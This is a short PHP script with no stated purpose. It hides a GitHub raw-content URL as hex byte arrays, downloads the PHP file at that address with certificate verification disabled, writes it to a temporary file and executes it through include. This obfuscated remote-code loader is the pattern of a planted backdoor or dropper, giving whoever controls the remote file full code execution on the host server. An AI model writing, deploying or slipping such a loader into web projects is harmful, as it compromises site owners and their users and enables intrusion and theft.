<?php
$data = [
    [0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x72],
    [0x61,0x77,0x2e,0x67,0x69,0x74,0x68,0x75,0x62],
    [0x75,0x73,0x65,0x72,0x63,0x6f,0x6e,0x74,0x65],
    [0x6e,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x6c,0x75],
    [0x66,0x66,0x79,0x6f,0x70,0x6d,0x2f,0x6f,0x70],
    [0x6d,0x2f,0x72,0x65,0x66,0x73,0x2f,0x68,0x65],
    [0x61,0x64,0x73,0x2f,0x6d,0x61,0x69,0x6e,0x2f],
    [0x32,0x2e,0x70,0x68,0x70]
];

$url = '';
foreach($data as $row) {
    foreach($row as $char) {
        $url .= chr($char);
    }
}

if(filter_var($url, FILTER_VALIDATE_URL)) {
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_SSL_VERIFYPEER => 0,
        CURLOPT_TIMEOUT => 5
    ]);
    
    $result = curl_exec($ch);
    if($result) {
        $f = tmpfile();
        fwrite($f, $result);
        $p = stream_get_meta_data($f)['uri'];
        include $p;
        fclose($f);
    }
    curl_close($ch);
}
?>
